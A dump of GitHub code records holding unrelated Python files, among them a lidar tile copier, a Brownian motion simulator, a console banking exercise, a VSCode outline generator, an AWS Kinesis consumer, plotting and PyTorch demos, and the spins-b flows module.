AtlassGen.makedir(args.output_dir.replace('\\\\','/'))\n tilelayoutfile = args.file\n filetype = args.filetype\n cores = args.cores\n copy = args.copy\n move = args.move\n batches = args.batches\n gen_block = args.gen_block\n block_size = int(args.block_size)\n ffile = args.txtfile\n usetxtfile = args.usetxtfile\n tilesize = args.tilesize\n tasks = {}\n \n\n\n tl_in = AtlassTileLayout()\n\n\n\n if usetxtfile:\n lines = [line.rstrip('\\n')for line in open(ffile)]\n \n \n modificationTime = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))\n for i,line in enumerate(lines):\n print(line)\n tilename = line\n\n x,y = tilename.split('_')\n\n tl_in.addtile(name=tilename, xmin=float(x), ymin=float(y), xmax=float(x)+tilesize, ymax=float(y)+tilesize, modtime=modificationTime)\n else:\n\n\n tl_in.fromjson(tilelayoutfile)\n \n no_of_tiles = len(tl_in)\n \n print('\\nTotal Number of Files : {0}'.format(no_of_tiles))\n batchlen=math.ceil(no_of_tiles/batches)\n batch=0\n \n if gen_block:\n features = []\n blocks = []\n\n\n print('\\nBlocking started.')\n block_path = os.path.join(outputfolder,'{0}m_blocks'.format(block_size)).replace('\\\\','/')\n\n\n for tile in tl_in:\n tilename = tile.name\n xmin = tile.xmin\n xmax = tile.xmax\n ymin = tile.ymin\n ymax = tile.ymax\n tilesize = int(int(xmax) - int(xmin))\n\n block_x = math.floor(xmin/block_size)*block_size\n block_y = math.floor(ymin/block_size)*block_size\n blockname = '{0}_{1}'.format(block_x,block_y)\n block_folder = os.path.join(block_path,blockname).replace('\\\\','/')\n\n if blockname not in blocks:\n blocks.append(blockname)\n\n boxcoords=AtlassGen.GETCOORDS([xmin,ymin],tilesize)\n poly = Polygon([[boxcoords[0],boxcoords[1],boxcoords[2],boxcoords[3],boxcoords[4]]])\n\n\n \n if not os.path.exists(block_folder):\n AtlassGen.makedir(block_folder)\n\n input = os.path.join(intputfolder,'{0}.{1}'.format(tilename, filetype)).replace('\\\\','/')\n output = os.path.join(block_folder,'{0}.{1}'.format(tilename, filetype)).replace('\\\\','/')\n #print(output)\n #block_task[blockname] = AtlassTask(blockname, movefiles, input, output)\n if copy:\n tasks[tilename] = AtlassTask(tilename, copyfile, input, output)\n elif move:\n tasks[tilename] = AtlassTask(tilename, movefiles, input, output)\n else:\n print(\"no command selected\")\n p=Pool(processes=cores) \n results=p.map(AtlassTaskRunner.taskmanager,tasks.values())\n\n success = 0\n for result in results:\n if not result.success:\n print('File {0} could Not be copied/moved'.format(result.name ))\n else:\n success +=1\n print('No of blocks : {0}'.format(len(blocks)))\n print('\\nFiles copied/moved Successfully : {0}'.format(success))\n\n\n for block in blocks:\n blockname = block\n block_folder = os.path.join(block_path,blockname).replace('\\\\','/')\n lfiles = AtlassGen.FILELIST(['*.{0}'.format(filetype)],block_folder)\n tilelayout = AtlassTileLayout()\n features = []\n for lf in lfiles:\n path, tilename, ext = AtlassGen.FILESPEC(lf)\n xmin,ymin = tilename.split('_')\n xmax = str(int(xmin)+tilesize)\n ymax = str(int(ymin)+tilesize)\n\n boxcoords=AtlassGen.GETCOORDS([xmin,ymin],tilesize)\n poly = Polygon([[boxcoords[0],boxcoords[1],boxcoords[2],boxcoords[3],boxcoords[4]]])\n\n #adding records for json file\n features.append(Feature(geometry=poly, properties={\"name\": tilename, \"xmin\": xmin, \"ymin\":ymin, \"xmax\":xmax, \"ymax\":ymax, \"tilenum\":tilename}))\n tilelayout.addtile(name=tilename, xmin=float(xmin), ymin=float(ymin), xmax=float(xmax), ymax=float(ymax))\n \n jsonfile = 'TileLayout'\n jsonfile = os.path.join(block_folder,'{0}_{1}.json'.format(jsonfile,len(features)))\n\n\n\n feature_collection = FeatureCollection(features)\n\n with open(jsonfile, 'w') as f:\n dump(feature_collection, f)\n\n\n\n\n\n\n\n\n else:\n for i, tile in enumerate(tl_in): \n \n tilename = '{0}.{1}'.format(tile.name,filetype)\n\n if i%batchlen==0:\n batch=batch+1\n batchstring='{0}'.format(batch)\n batchstring=batchstring.rjust(3, '0')\n if batches==1:\n output = os.path.join(outputfolder, tilename).replace(\"\\\\\", \"/\")\n else:\n output = os.path.join(AtlassGen.makedir('{0}/Batch_{1}'.format(outputfolder,batchstring)), tilename).replace(\"\\\\\", \"/\")\n\n input = os.path.join(intputfolder, tilename).replace(\"\\\\\", \"/\")\n \n if copy:\n tasks[tilename] = AtlassTask(tilename, copyfile, input, output)\n elif move:\n tasks[tilename] = AtlassTask(tilename, movefiles, input, output)\n else:\n print(\"no command selected\")\n\n\n p=Pool(processes=cores) \n results=p.map(AtlassTaskRunner.taskmanager,tasks.values())\n\n success = 0\n for result in results:\n if not result.success:\n print('File {0} could Not be copied/moved'.format(result.name ))\n else:\n success +=1\n \n print('Files copied/moved Successfully : {0}'.format(success))\n\nif __name__ == \"__main__\":\n main() \n","repo_name":"maneshadslv/AtlassTools","sub_path":"CreateArea.py","file_name":"CreateArea.py","file_ext":"py","file_size_in_byte":9822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37167989716","text":"from abc import abstractmethod\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nclass MonteCarloSimulator:\n\n def __init__(self, T: float, n_steps: float, n_sims: float, seed: int, scheme: str = None):\n\n self.n_steps = n_steps\n self.n_sims = n_sims\n self.seed = seed\n self.scheme = scheme\n self.T = T\n self.dt = self.T / (self.n_steps - 1)\n\n\nclass GeometricBrownianMotionSimulator(MonteCarloSimulator):\n\n\n def __init__(self, S0: float, sigma: float, rf: float, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.S0 = S0\n self.sigma = sigma\n self.rf = rf\n self.get_theoretical_moments()\n\n\n# these are static methods since numba/cuda will not work otherwise\n # for future development\n\n def get_theoretical_moments(self):\n self.theoretical_mean = self.S0 * np.exp(self.rf * self.T)\n self.theoretical_variance = self.S0 ** 2 * np.exp(2 * self.rf * self.T) * (np.exp(self.sigma ** 2 * self.T) - 1)\n\n # ES3 = self.S0 ** 3 * np.exp(3 * self.rf + 3 * self.sigma)\n # self.theoretical_skewness = (ES3 - 3 * self.rf * self.sigma ** 2 + 2 * self.rf ** 3) / self.sigma ** 3\n\n @staticmethod\n def _closed_form(S_prev, rf, dt, sigma, normal):\n pass\n\n @staticmethod\n def _euler_maruyama_scheme(S_prev, rf, dt, sigma, normal):\n return S_prev * (1 + rf * dt + sigma * normal * np.sqrt(dt))\n\n @staticmethod\n def _milstein_scheme(S_prev, rf, dt, sigma, normal):\n dW = normal * np.sqrt(dt)\n return S_prev * (1 + rf * dt + sigma * dW + 0.5 * sigma**2 * (dW ** 2 - dt))\n\n @staticmethod\n def _runge_kutta(S_prev, rf, dt, sigma, normal):\n dW = normal * np.sqrt(dt)\n S_hat = S_prev * (1 + rf * dt + sigma * np.sqrt(dt))\n euler_term = S_prev * (1 + rf * dt + sigma * normal * np.sqrt(dt))\n adjustment = 0.5 * (sigma * (S_hat - S_prev)) * (dW ** 2 - dt) / np.sqrt(dt)\n return euler_term + adjustment\n\n @staticmethod\n def _closed_form_soln(S_prev, rf, dt, sigma, normal):\n W = normal * np.sqrt(dt)\n return S_prev * np.exp((rf - sigma ** 2 / 2) * dt + sigma * W)\n\n @staticmethod\n def _simulate(S0, rf, dt, sigma, normal, n_sims, n_steps, func: object):\n\n S = np.zeros((n_sims, n_steps))\n S[:,0] = S0\n\n for i in range(n_steps-1):\n S[:,i+1] = func(S[:,i], rf, dt, sigma, normal[:,i])\n\n return S\n\n\n def simulate(self):\n np.random.seed(self.seed)\n normal = np.random.normal(0, 1, size=(self.n_sims, self.n_steps))\n\n if self.scheme == 'Euler-Maruyama':\n func = self._euler_maruyama_scheme\n elif self.scheme == 'Milstein':\n func = self._milstein_scheme\n elif self.scheme == 'Runge-Kutta':\n func = self._runge_kutta\n else:\n func = self._closed_form_soln\n\n self.S = self._simulate(self.S0, self.rf, self.dt, self.sigma, normal, self.n_sims, self.n_steps, func)\n\n\n def plot_paths(self):\n if self.scheme is not None:\n plt.title(f\"Simulated GBM paths using {self.scheme} discr. scheme\")\n if self.scheme is not None:\n for j in range(self.n_sims):\n plt.plot(self.S[j,:])\n plt.grid(True)\n\n def plot_dist(self):\n plt.title(f\"Distribution using {self.scheme} discr. scheme\")\n sns.histplot(self.S[:,-1])\n plt.show()\n\n\n\n\n\n\n\n\n","repo_name":"DeblueJenkins/the_blue_analytics","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40037754503","text":"## Projeto de Sistema Bancário em Python\n\nmenu = \"\"\"\n\n[d] depósito\n[s] saque\n[e] extrato\n[q] sair\n\n=> \"\"\"\n\nsaldo = 0\nlimite = 500 \nextrato = \"\"\nsaques_realizados = 0\nLIMITE_SAQUES = 4\n\nwhile True:\n option = input(menu)\n\n if option == \"d\":\n valor = float(input(\"Informe o valor do depósito: \"))\n\n if valor > 0:\n saldo += valor\n extrato += f\"Depósito: R$ {valor:.2f}\\n\"\n \n else:\n print(\"Operação falhou. Valor inválido.\")\n\n elif option == \"s\":\n valor = float(input(\"Informe o valor do saque: \"))\n\n excedeu_saldo = valor > saldo\n\n excedeu_limite = valor > limite\n\n excedeu_saques = saques_realizados >= LIMITE_SAQUES\n\n if excedeu_saldo: \n print (\"Falha! Sem saldo suficiente\")\n elif excedeu_limite:\n print (\"Falha! Limite de valor para saque excedido\")\n elif excedeu_saques:\n print (\"Falha! Limite de saques excedido, apenas 4 permitidos\")\n \n \n elif valor > 0:\n saldo -= valor\n extrato += f\"Saque: R$ {valor:.2f}\\n\"\n saques_realizados += 1\n \n\n else:\n print(\"Falha! Valor informado é inválido!\")\n \n elif option == \"e\":\n print (\"\\n=========== EXTRATO ===========\")\n print (\"Não foram realizadas operações.\" if not extrato else extrato)\n print (f\"\\nSaldo: R$ {saldo:.2f}\")\n print (\"===============================\")\n elif option == \"q\":\n break\n \n else:\n print (\"Opção inválida! Por favor selecione uma operação válida\")","repo_name":"gustavosampaio95/sistema-bancario-python","sub_path":"Projeto de Sistema Bancário em Python.py","file_name":"Projeto de Sistema Bancário em Python.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42220713622","text":"from os.path import join, dirname, basename, exists\nfrom textx.metamodel import metamodel_from_file\nfrom textx.export import metamodel_export, model_export\nfrom shutil import copyfile\nfrom jinja2 import Template\n\nclass OutlineVSCode(object):\n\n def __init__(self, configuration):\n self.configuration = configuration\n self.outline_path = join(self.configuration.project_path, 'out', 'src', 'outline')\n self.this_folder = dirname(__file__)\n\n def do_outline_for_vscode(self):\n if self.configuration.outline_path == '':\n return\n self.generate_python_interpreter_path()\n self.copy_script()\n self.copy_outline_tx()\n self.copy_outline_program()\n self.copy_language_grammar()\n self.generate_codeOutline_js()\n #self.copy_code_outline()\n model = self.get_outline_model()\n self.copy_icons(model)\n\n def get_outline_model(self):\n this_folder = dirname(__file__)\n language = metamodel_from_file(join(dirname(__file__), 'resources', 'outline.tx'))\n metamodel_export(language, join(dirname(__file__), 'outline.dot'))\n grammar_model = language.model_from_file(self.configuration.outline_path)\n model_export(grammar_model, join(this_folder, 'outline.dot'))\n return grammar_model\n\n def generate_python_interpreter_path(self):\n with open(join(self.outline_path, 'python_interpreter.txt'), 'w') as file:\n file.write(self.configuration.python_interpreter)\n\n def copy_script(self):\n copyfile(join(self.this_folder, 'resources', 'script.py'),join(self.outline_path, 'script.py'))\n\n def copy_outline_tx(self):\n copyfile(join(self.this_folder, 'resources', 'outline.tx'),\n join(self.outline_path, 'outline.tx'))\n\n def copy_outline_program(self):\n copyfile(join(self.configuration.outline_path), join(self.outline_path, 'outline.ol'))\n\n def copy_language_grammar(self):\n with open(self.configuration.grammar_path, 'r') as grammar_file, \\\n open(join(self.outline_path, 'language.tx'), 'w') as language_file:\n language_file.write(grammar_file.read())\n\n def generate_codeOutline_js(self):\n this_folder = dirname(__file__)\n with open(join(this_folder, 'templates', 'codeOutline.js.template'), 'r') as file:\n data = file.read()\n template = Template(data)\n extension = self.get_data()\n result = template.render(extension)\n result_file = open(join(self.configuration.project_path, 'out', 'src', 'outline', 'codeOutline.js'), 'w')\n result_file.write(result)\n\n def get_data(self):\n extension = {\n 'name': self.configuration.language_name\n }\n return extension\n\n #def copy_code_outline(self):\n # copyfile(join(self.this_folder, 'resources', 'codeOutline.js.template'),\n #\n # join(self.configuration.project_path, 'out', 'src', 'outline', 'codeOutline.js.template'))\n\n def copy_icons(self, model):\n for rule in model.rules:\n if rule.icon != None and exists(rule.icon.path):\n name = basename(rule.icon.path)\n copyfile(rule.icon.path, join(self.configuration.project_path, 'resources', 'icons', name))\n","repo_name":"starcev/textX-extensions","sub_path":"outline/outline.py","file_name":"outline.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"6584648102","text":"from boto.kinesis.exceptions import ProvisionedThroughputExceededException\nimport datetime\nimport boto3\nimport time\n\nkinesis=boto3.client('kinesis')\n\nclass KinesisConsumer:\n \"\"\"Generic Consumer for Amazon Kinesis Streams\"\"\"\n def __init__(self, stream_name, shard_id, iterator_type,\n worker_time=30, sleep_interval=0.5):\n\n self.stream_name = stream_name\n self.shard_id = str(shard_id)\n self.iterator_type = iterator_type\n self.worker_time = worker_time\n self.sleep_interval = sleep_interval\n\n def process_records(self, records):\n \"\"\"the main logic of the Consumer that needs to be implemented\"\"\"\n for part_key, data in self.iter_records(records):\n print(part_key, \":\", data)\n raise NotImplementedError\n\n @staticmethod\n def iter_records(records):\n for record in records:\n part_key = record['PartitionKey']\n data = record['Data']\n yield part_key, data\n\n def run(self):\n \"\"\"poll stream for new records and pass them to process_records method\"\"\"\n print(\"-----RUN-----\")\n response = kinesis.get_shard_iterator(StreamName=self.stream_name,\n ShardId=self.shard_id, ShardIteratorType=self.iterator_type)\n \n # print(\"====RESPONSE=====\")\n # print(response)\n # print(\"\\n\\n\\n\")\n \n next_iterator = response['ShardIterator']\n\n # print(\"====NEXT_IT=====\")\n # print(next_iterator)\n # print(\"\\n\\n\\n\")\n \n start = datetime.datetime.now()\n finish = start + datetime.timedelta(seconds=self.worker_time)\n\n while finish > datetime.datetime.now():\n try:\n response = kinesis.get_records(ShardIterator=next_iterator, Limit=25)\n\n records = response['Records']\n \n # print(\"====RECORDS=====\")\n # print(records)\n # print(\"\\n\\n\\n\")\n\n if records:\n self.process_records(records)\n\n next_iterator = response['NextShardIterator']\n time.sleep(self.sleep_interval)\n except ProvisionedThroughputExceededException as ptee:\n time.sleep(1)\n \n \n \nclass EchoConsumer(KinesisConsumer):\n \"\"\"Consumers that echos received data to standard output\"\"\"\n def process_records(self, records):\n \"\"\"print the partion key and data of each incoming record\"\"\"\n for part_key, data in self.iter_records(records):\n print(part_key, \":\", data)\n \n \nshard_id = 'shardId-000000000004'\niterator_type = 'LATEST'\nworker = EchoConsumer(\"testowy\", shard_id, iterator_type, worker_time=20)\n\nworker.run()","repo_name":"jwszol-classes/isp-2020-ZekJakGynDam","sub_path":"old/Kinesis_przyklad/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"10085137040","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPlot example\n\nUse some modules and those functions to make beutiful plot for own purpose\n\nYou can read the full code by typing command line \"plot_test??\" on the ipython\nconsole or ctrl+left_click on the spyder text editor after importing this code.\n\nIf you want to plot a graph on new window interactively change the backend of\nyour console\nex) on the ipython console type \"%matplotlib\", where % can be omitted\n\n\nCreated on Wed Jul 20 14:49:42 2016\n\n@author : Kang, J\n-----------------------------------------------\nShow an example of the way how to use matplotlib.\n\n\"\"\"\n\n__author__= \"Kang,J : jhkang@astro.snu.ac.kr\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n#Variable\nx=np.linspace(0,100,11)\ny=2*x.copy()\n\n#figure size -----------------------------------------------\nfig=plt.figure(1,figsize=(16,10))\n#ax=fig.add_subplot(111)\n\n#font setup-------------------------------------------------\n#usually the Helvetica is the default font\n#hfont=['fontname':'Helvetica']\n#plt.rcParams['font.family']='Helvetica'\n#plt.subplot(111)\n\n#plot -----------------------------------------------------------\n#ax=plt.subplot(111)\nplt.plot(x,x,color='black',linestyle='solid',marker='o',markerfacecolor='red',\n markersize=7,markeredgecolor='blue',linewidth=2)\nplt.plot(x,y,color='blue',linestyle='dashed',marker='+',\n markerfacecolor='green',markersize=10,markeredgecolor='green',\n linewidth=2,markeredgewidth=2)\n\n#create the text on the graph\nplt.annotate('SDO/AIA 171',xy=(25,25),color='blue',fontsize=20,\n fontweight='bold') \nplt.text(15,15,'plt.text',fontsize=20,fontweight='bold')\n\n#plot symbol on the graph\nplt.plot([75],[75],'o',markerfacecolor='green',markersize=10,\n markeredgecolor='black')\n\n#arrow mark and text\nplt.annotate(\"I'M OUTSIDER\",xy=(75,75),xytext=(80,60),color='black',\n fontsize=20,arrowprops=dict(facecolor='red',shrink=0.05),\n fontweight='bold')\n \n#legendary\nplt.legend(('line1','line2'),loc=1,fontsize=20,handlelength=3)\n\n\n#Axes & Tick setup----------------------------------------------------\nplt.rc('axes',linewidth=2.5)\nplt.ylim([0,100])\n\nplt.tick_params(width=2.5,length=10,direction='out',axis='y')\nplt.tick_params(width=2.5,length=10,direction='in',axis='x')\n\n#If you wnat to set minorticks,\n#ax.minorticks_on()\n#ax.thick_params(width=1,length=5,which='minor')\n\n#if you want to set tick in each axes,\nplt.xticks(np.linspace(0,100,5),fontsize=20,fontweight='bold')\nplt.yticks(np.linspace(0,100,6,endpoint=True),fontsize=20,fontweight='bold')\n\n#if you want to set tick as string\n#plt.xticks(np.linspace(0,100,5),['name',r'$\\alpha$',r'$0$','d','f'])\n#axis range\n\n#Title--------------------------------------------------------\n\nplt.xlabel(r'IMX-axis $\\mathbf{\\gamma}$',fontsize=20,fontweight='bold')\nplt.ylabel(r'IMx-axis $\\mathbf{\\alpha}$',fontsize=20,fontweight='bold')\nplt.title(r'SDO/AIA 171 $\\mathbf{\\AA}$',fontsize=20,fontweight='bold')\n\n\n#invert axes-------------------------------------------------\n#ax.inver_xaxis()\n\n#show the image---------------------------------------------\nplt.show()\n\n#2d image--------------------------------------------------\na=np.arange(25)\nb=a.reshape((5,5))-12\nfig=plt.figure(2,figsize=(16,10))\nim=plt.imshow(b,cmap=plt.cm.Greys_r,origin='lower')\nplt.clim(-10,10) # color bar limit\nplt.xticks([0,2,4],fontsize=20)\nplt.colorbar(im,ticks=[-10,0,10])\nplt.show()\n#You have to causion that python plot 2d array from left top to right bottom\n#But IDL plot 2d array from left bottom to top right","repo_name":"SNU-sunday/Python-Learning","sub_path":"example_script/plot_test.py","file_name":"plot_test.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"19275333667","text":"# author azure\n#lst = [\"赵四\",\"施瓦辛格\",\"海波\",\"郭大侠\",\"赛利亚\"]\n# 在后面添加\n#lst.append(\"黄宏\") # 在原有的基础上进行的操作\n# 在前面添加\n#lst.insert(1,\"王力宏\") #在1位置插入\n\n# lst.extend(\"马化腾\") # 迭代添加 单字加\n# lst.extend([\"马云\",\"王健林\"]) #整个加\n# print(lst)\n\n# 删除\n# data = lst.pop(2) #返回被删除的数据\n# print(data)\n# print(lst)\n# lst.remove(\"赵四\") #删除元素\n# lst.remove(\"刘能\") #如果不存在即报错\"x not in list\"\n\n#切片删除\n#del lst[1:3]\n\n#清空\n# lst.clear()\n# print(lst)\n\n# lst = [\"王者荣耀\",\"魔兽世界\",\"DNF\",\"你受寒\",\"cs\"]\n# # lst[0] = \"扫雷\" #替换\"王者荣耀\"为\"扫雷\".\n# # lst[1:3] = [\"跑跑卡丁车\"] # 先删除在追加\n# lst[1::2] = [\"qq华夏\",\"QQ三国\"] #切片的时候.如果步长不是1.注意元素的个数\n# print(lst)\n\nlst = [\"锅包肉\",\"火锅\",\"烤鱼\",\"白菜\",\"烤鸭\"]\n\nfor el in lst: #element(元素)\n print(el)","repo_name":"azure-sea/python","sub_path":"第004章 列表_元组/列表的增删改查.py","file_name":"列表的增删改查.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"35773891997","text":"from typing import List, Union\n\nimport copy\nimport dataclasses\nimport numbers\n\nimport numpy as np\n\n\nclass FlowMeta(type):\n \"\"\"Creates a new `Flow` object.\n\n This metaclass is responsible for the following:\n (1) Turning `Flow` classes into dataclasses. This is merely for usability.\n (2) Automatically generating `ConstFlags` if it does not already exist.\n (3) Automatically generating `Grad` if it does not already exist.\n\n A `Flow` class must have the following two counterparts:\n (1) `ConstFlags` is a dataclass with flags for every non-constant flow field\n that is used by `NodeFlags` to indicate whether the flags are constant\n or frozen. These are used to optimize function and gradient evaluation.\n (2) `Grad` is a gradient flow object corresponding to the flow class.\n\n A valid `ConstFlags` must resemble the following:\n\n ```python\n\n class ConstFlags:\n\n def __bool__(self) -> bool:\n # Indicates whether the flow is entirely constant.\n\n def set_all(self, value: bool) -> None:\n # Sets all the fields to have constantness given by `value`.\n ```\n The default implementation simply makes a field for `ConstFlags` for every\n non-constant field in the flow.\n\n A valid `Grad` must resemble the following:\n\n ```python\n\n # Must inherit from `Flow.Grad`.\n class Grad(flows.Flow.Grad):\n\n def __iadd__(self, value: Grad) -> Grad:\n # Implements how to sum a version of itself.\n # This is used by backprop.\n ```\n The default implementation makes a field called \"XXX_grad\" for every\n non-constant field in the flow named \"XXX\". The default `__iadd__`\n implementation performs `__iadd__` on each of the fields in `Grad`.\n \"\"\"\n\n def __new__(meta, name, bases, class_dict):\n cls = type.__new__(meta, name, bases, class_dict)\n cls = dataclasses.dataclass(cls, eq=False)\n\n # Get the fields for inner class autogeneration.\n cls_fields = dataclasses.fields(cls)\n # Keep track of all the fields that can vary.\n nonconst_fields = []\n for field in cls_fields:\n if (\"constant_field\" in field.metadata) and (\n field.metadata[\"constant_field\"]):\n continue\n nonconst_fields.append(field)\n\n # Create constant flag class.\n if \"ConstFlags\" not in cls.__dict__:\n const_flag_fields = [(field.name, bool,\n dataclasses.field(default=False))\n for field in nonconst_fields]\n cls.ConstFlags = dataclasses.make_dataclass(name + \".ConstFlags\",\n const_flag_fields)\n\n def __bool__(self) -> bool:\n return all(\n getattr(self, field.name) for field in nonconst_fields)\n\n def set_all(self, value: bool) -> None:\n for field in nonconst_fields:\n setattr(self, field.name, value)\n\n cls.ConstFlags.__bool__ = __bool__\n cls.ConstFlags.set_all = set_all\n\n # Create the gradient class.\n if \"Grad\" not in cls.__dict__:\n grad_fields = [(field.name + \"_grad\", field.type, np_zero_field(1))\n for field in nonconst_fields]\n\n grad_bases = tuple(cls_base.Grad for cls_base in bases)\n cls.Grad = dataclasses.make_dataclass(name + \".Grad\",\n grad_fields,\n bases=grad_bases)\n\n def __iadd__(self, value):\n for field in grad_fields:\n field_val = getattr(self, field[0])\n value_val = getattr(value, field[0])\n try:\n field_val.__iadd__(value_val)\n except AttributeError:\n setattr(self, field[0], value_val + field_val)\n return super(cls.Grad, self).__iadd__(value)\n\n cls.Grad.__iadd__ = __iadd__\n\n return cls\n\n\ndef np_zero_field(n: int):\n \"\"\"Creates a field that defaults to a numpy array with zeros.\n\n Args:\n n: Number of elements in array.\n\n Returns:\n Dataclass field that produces an array with `n` zeros.\n \"\"\"\n return dataclasses.field(default_factory=lambda: np.zeros(n))\n\n\ndef constant_field(**kwargs):\n \"\"\"Marks a flow field as constant.\n\n Constant flow fields are not permitted to change value once set, and\n consequently, the gradient for these fields do not exist.\n\n Args:\n kwargs: Keyword arguments to pass to `dataclasses.field`.\n\n Returns:\n A dataclasses field where `metadata` has entry `\"constant_field\": True`.\n \"\"\"\n if \"metadata\" not in kwargs:\n kwargs[\"metadata\"] = {}\n kwargs[\"metadata\"].update({\"constant_field\": True})\n return dataclasses.field(**kwargs)\n\n\nclass Flow(metaclass=FlowMeta):\n\n class Grad:\n\n def __iadd__(self, value):\n return self\n\n def __eq__(self, other: \"Flow\") -> bool:\n \"\"\"Checks if two dataclasses are equal to which other.\n\n We need to implement equality operator separately to handle NumPy\n arrays, which require calling `.all()` to indicate equality.\n\n Args:\n other: Flow to compare to.\n\n Returns:\n `True` only if `self` and `other` are the same type and their\n values are equal.\n\n Raises:\n NotImplemented: If the flow types are different between `self`\n and `other`.\n \"\"\"\n if self is other:\n return True\n\n if self.__class__ != other.__class__:\n raise NotImplemented(\n \"Cannot compare flow types, got {} and {}\".format(self, other))\n\n for val1, val2 in zip(dataclasses.astuple(self),\n dataclasses.astuple(other)):\n\n if val1 is val2:\n equal = True\n elif isinstance(val1, np.ndarray) and isinstance(val2, np.ndarray):\n equal = (val1.shape == val2.shape) and (val1 == val2).all()\n else:\n equal = val1 == val2\n if not equal:\n return False\n return True\n\n\nclass NumericFlow(Flow):\n \"\"\"Represents a numeric value.\n\n This flow is implemented here because of its special nature (e.g. all\n variables are numeric flows, gradient calculations start with a numeric\n flow).\n \"\"\"\n array: np.ndarray = 0\n\n @dataclasses.dataclass\n class Grad(Flow.Grad):\n array_grad: np.ndarray = np_zero_field(1)\n\n def __iadd__(self, value):\n self.array_grad += value.array_grad\n return super().__iadd__(value)\n\n def __eq__(self, value) -> bool:\n if type(self) == NumericFlow.Grad:\n if isinstance(value, numbers.Number):\n return np.all(self.array_grad == value)\n elif isinstance(value, np.ndarray):\n return np.all(self.array_grad == value)\n elif type(value) == NumericFlow.Grad:\n return np.all(self.array_grad == value.array_grad)\n return super().__eq__(value)\n\n def __eq__(self, value) -> bool:\n if type(self) == NumericFlow:\n if isinstance(value, numbers.Number):\n return np.all(self.array == value)\n elif isinstance(value, np.ndarray):\n return np.all(self.array == value)\n elif type(value) == NumericFlow:\n return np.all(self.array == value.array)\n return super().__eq__(value)\n","repo_name":"stanfordnqp/spins-b","sub_path":"spins/goos/flows.py","file_name":"flows.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","stars":246,"dataset":"github-code","pt":"60"} +{"seq_id":"8401901749","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 25 22:06:43 2021\n\n@author: muhittin can\n\"\"\"\n\nimport pickle\nimport numpy as np\nopen_file = open(\"Test_Data_LSTM\", \"rb\")\nTests = pickle.load(open_file)\nopen_file.close()\n\n\nprint(\"In our test, you will try to identify if a song is real or computer generated. Listen to each song provided and answer:\")\nprint(\"1 if you think the song is real\")\nprint(\"0 if you think the song is computer generated\")\n\nReal_accuracy = 0\nFake_accuracy = 0\n\nfor i in range(0,100):\n \n answer = input(\"Answer for song number \"+str(i+1)+\" : \")\n \n if answer == \"1\" and Tests[i][-1] == \"Real\":\n Real_accuracy = Real_accuracy + 1\n \n if answer == \"0\" and Tests[i][-1] == \"Fake\":\n Fake_accuracy = Fake_accuracy + 1 \n \n\nprint(\"True answers for Real:\",Real_accuracy)\nprint(\"True answers for Computer_generated:\",Fake_accuracy)\n\n","repo_name":"mustafayasar28/Music-Generation-using-LSTM","sub_path":"Evaluation/LSTM-Human-Test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37257139080","text":"lists = []\r\ntotal = 0\r\nuser = \"john\"\r\nnumber = 0\r\n\r\n\r\ndef looper():\r\n global avarage\r\n global number\r\n global total\r\n while number >= 0:\r\n number = int(input(\"Please enter a number\"))\r\n print(number)\r\n if number >= 0:\r\n lists.append(number)\r\n for i in lists:\r\n total = total + i\r\n avarage = total / len(lists)\r\n\r\n\r\nname = input(\"Please enter your name\")\r\nif name == user:\r\n looper()\r\n print(\"The average Number entered is > {}\".format(avarage))\r\nelse:\r\n print(\"You are not a verified user.\")\r\n\r\n\r\n\r\n","repo_name":"Nockternal/Burger","sub_path":"intro to programming/Task 13/while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32012771656","text":"import torch\nimport torch.utils.data as Data\nBATCH_SIZE = 5\ntorch.manual_seed(1)\nx = torch.linspace(-1,1,10)\ny = torch.linspace(-2,2,10)\n\ndata_set = Data.TensorDataset(x,y)#用tensor初始化一个数据集\nloader = Data.DataLoader(\n dataset=data_set, #数据集\n batch_size=BATCH_SIZE, #批量处理数目\n shuffle=True, #打乱顺序\n num_workers=2, #分在两个线程中\n)\n\ndef show_loader():\n for epoch in range(3):\n for step, (batch_x, batch_y) in enumerate(loader):\n print('Epoch:', epoch, '|step:', step, '|batch_x:', batch_x.data.numpy(), '|batch_y:', batch_y.data.numpy())\n\nif __name__ == '__main__':\n show_loader()","repo_name":"Unrivaled2/RLcode","sub_path":"venv/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"73969109310","text":"import pkg_resources\n\ntry:\n pkg_resources.get_distribution('numpy')\nexcept pkg_resources.DistributionNotFound:\n numpyPresent = False\n print(\"Error: Numpy package not available.\")\nelse:\n numpyPresent = True\n import numpy as np\n\n\ntry:\n pkg_resources.get_distribution('pandas')\nexcept pkg_resources.DistributionNotFound:\n pandasPresent = False\n 